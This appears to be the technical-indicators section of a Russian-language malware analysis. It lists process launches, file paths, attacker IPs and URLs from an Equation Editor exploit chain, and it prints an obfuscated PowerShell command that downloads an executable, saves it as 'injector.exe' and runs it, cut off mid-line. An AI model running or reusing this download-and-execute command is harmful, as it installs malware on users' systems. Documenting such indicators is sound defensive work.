Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\cmd.bat" "
- %APPDATA%\cmd.bat
- '23.##.235.86':80
- http://23.##.235.86/whd/cmd.bat
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoP"r"o"f"ile -Executi"o"nPolic"y" Bypass -W"i"ndowStyle Hidden -C"o"mmand "I"nv"o"ke-WebReq"u"est http://84.252.120.161/chromes/chrome.exe -"O"ut"fi"le in"j"ector.exe; St"art-Process in"j"ect...